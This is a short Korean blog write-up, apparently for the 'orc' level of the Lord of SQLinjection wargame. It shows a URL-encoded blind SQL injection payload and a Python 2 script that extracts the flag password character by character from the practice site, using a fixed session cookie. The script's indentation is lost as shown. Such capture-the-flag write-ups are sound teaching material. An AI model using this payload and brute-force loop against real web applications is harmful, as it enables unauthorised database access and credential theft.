pw 길이 찾기 : 123%27%20or%20ascii(id)-103%20and%20if(length(pw)=8,1,1=2)%23
플래그는 8자리이며 blind sqlinjection으로 풀었다.
import urllib, urllib2
url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw="
result = ""
for i in range(1, 16):
for j in range(33,127):
payload = "123%27%20or%20ascii(id)-103%20and%20if(ascii(substr(pw,{},1))={},1,1=2)%23".format(i, j)
testurl = url + payload
print testurl
req = urllib2.Request(testurl)
req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11')
req.add_header('Cookie','__cfduid=d4cc8c809fb82627de6749e5eaac73e1f1500957474; PHPSESSID=498v4fb9opfr78vauqu83eq635')
res = urllib2.urlopen(req).read()
if "Hello admin" in res:
print "[*]Find!"
result += chr(j)
break
print "[+]FIND FLAG! : {}".format(result)
'Wargame > lord of sqlinjection' 카테고리의 다른 글
| Lord of SQLinjection Darkelf (0) | 2017.07.25 |
|---|---|
| Lord of SQLinejction wolfman (0) | 2017.07.25 |
| Lord of SQLinjection goblin (0) | 2017.07.25 |
| Lord of SQLinjection cobolt (0) | 2017.07.25 |
| Lord of SQLinjection Gremlin (0) | 2017.07.25 |